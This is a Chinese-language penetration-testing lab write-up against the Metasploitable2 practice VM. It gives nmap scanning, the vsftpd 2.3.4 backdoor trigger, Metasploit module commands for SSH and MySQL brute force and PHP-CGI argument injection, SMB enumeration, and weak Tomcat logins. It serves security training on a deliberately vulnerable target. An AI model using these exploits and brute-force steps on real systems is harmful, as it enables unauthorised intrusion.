Merasploitable2下载地址Metasploitable download | SourceForge.net
环境准备
Kali:192.168.224.129
靶机:192.168.224.135
信息收集
打开kali 使用nmap扫描工具对靶机进行扫描
Nmap -sV 192.168.224.135
可以发现TCP端口21 22 23等都有开放
脆弱性分析
首先21端口ftp服务版本号是2.3.4,首先想到的就是笑脸后门
其次是22、23号端口,可以使用msf暴力破解来获取账号密码
80端口为apache的2.2.8 for linux,可以参考往年的CVE来进行测试
139与445端口为smb共享服务,可以尝试msfsmb模块进行测试
1524端口在以前的一篇文章中看到过介绍,可能存在后门
3306端口为mysql数据库端口,可以直接进行爆破
8180端口看介绍反馈为apache tomcat,可以试着弱口令测试tomcat的账号密码
剩余的可以使用msf进行搜索服务
测试
首先是21端口,我们使用ftp连接一下看可以得到什么反馈
反馈很好,进行测试,输入root:)看是否成功
密码随便输
Successful
22端口:暴力破解ssh
打开msfconsole,
Search ssh_login搜索模块
Use auxilary/scanner/ssh/ssh_login 使用模块
Set rhost 192.168.224.135 设置目标地址
Set user_file /root/1.txt 设置用户字典路径
Set pass_file /root/2.txt 设置密码字典路径
Set threads 100 设置线程
Options 查看设置
Run 开始跑
账号密码出来了
23端口telnet 刚才已经跑出来了账号密码
直接连接输入账号密码
Telnet 192.168.224.135
登录成功!
80端口
先访问一下此靶机的80端口的/phpinfo.php看一下
参阅往年cve发现了一个2012年的漏洞,server API是CGI方式运行的,这个方式在php存在漏洞-Cgi参数注入
打开msf
搜一下php-cgi
使用模板multi/http/php_cgi_arg_injection
修改一下目标ip set rhosts 192.168.224.135
查看一下配置 options
Exploit 开跑
Successful!
139和445端口为smb共享服务,可以在msf里搜索一下smb相关的模块进行测试
使用模块scanner/smb/smb_enumshares
Use scanner/smb/smb_enumshares
设置ip set rhost 192.168.224.135
成功
3306mysql数据库
首先想到的就是msf中mysql暴力破解登录的模板
直接调用测试
Search mysql_login
Use 0
Options 查看一下需要哪些参数
Set rhosts 192.168.224.135 设置ip
Set username root 设置mysql数据库登录账号
Exploit 跑一下
成功
8180端口tmocat
尝试了一下弱口令
Tomcat tomcat
既然登录成功了
目前只发现了这么几个.......